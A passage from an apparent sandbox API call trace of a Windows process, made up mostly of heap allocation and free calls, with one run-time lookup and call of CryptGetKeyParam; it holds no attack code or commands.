dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0161.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0161.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0161.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0161.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0161.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0161.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0161.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0161.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0161.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0161.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0161.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0161.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0161.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0161.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0161.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0161.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0161.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0161.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0161.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0161.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0161.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0161.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0161.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0161.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0161.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0161.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0161.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0161.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0161.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0161.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0161.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0161.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0161.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0161.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0161.920] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0161.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0161.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0161.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0161.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0161.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0161.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0161.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0161.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0161.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0161.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0161.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0161.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0161.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0161.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0161.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0161.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0161.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0161.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0161.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0161.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0161.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0161.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0161.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0161.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0161.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0161.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0161.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0161.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0161.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0161.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0161.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0161.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0161.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0161.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0161.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0161.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0161.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0161.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0161.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0161.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0161.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0161.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0161.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0161.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0161.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0161.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0161.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0161.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0161.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0161.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0161.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0161.923] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0161.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x11) returned 0x90d420 [0161.924] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x90d420, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0161.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0161.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0161.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0161.924] GetProcAddress (hModule=0x74f20000, lpProcName="CryptGetKeyParam") returned 0x74f477cb [0161.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0161.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0161.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0161.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0161.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0161.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0161.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0161.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0161.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0161.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0161.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0161.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0161.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0161.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0161.924] CryptGetKeyParam (in: hKey=0x90af98, dwParam=0x7, pbData=0x9c2878, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2878*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0161.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0161.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0161.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0161.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0161.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0161.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0161.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0161.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0161.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0161.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0161.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0161.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0161.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0161.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0161.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0161.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0161.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0161.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0161.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0161.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0161.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0161.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0161.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0161.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0161.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0161.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0161.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0161.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0161.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0161.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0161.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0161.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0161.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0161.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0161.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0161.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0161.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0161.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0161.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0161.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0161.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0161.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0161.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0161.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0161.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0161.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0161.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0161.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0161.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0161.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0161.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0161.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0161.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0161.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0161.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0161.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0161.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0161.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0161.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0161.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0161.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0161.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0161.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0161.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0161.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0161.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0161.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0161.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0161.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0161.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0161.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0161.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0161.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0161.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0161.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0161.927] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0161.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0161.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0161.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0161.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0161.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0161.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0161.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0161.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d4a0 [0161.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0161.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0161.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0161.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0161.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0161.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0161.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b058 [0161.927] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0161.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0161.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0161.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0161.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0161.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d4a0 [0161.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0161.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0161.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0161.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0161.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0161.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0161.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0161.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0161.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0161.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0161.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0161.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0161.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0161.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0161.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0161.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0161.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0161.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0161.928] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0161.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0161.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0161.928] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, 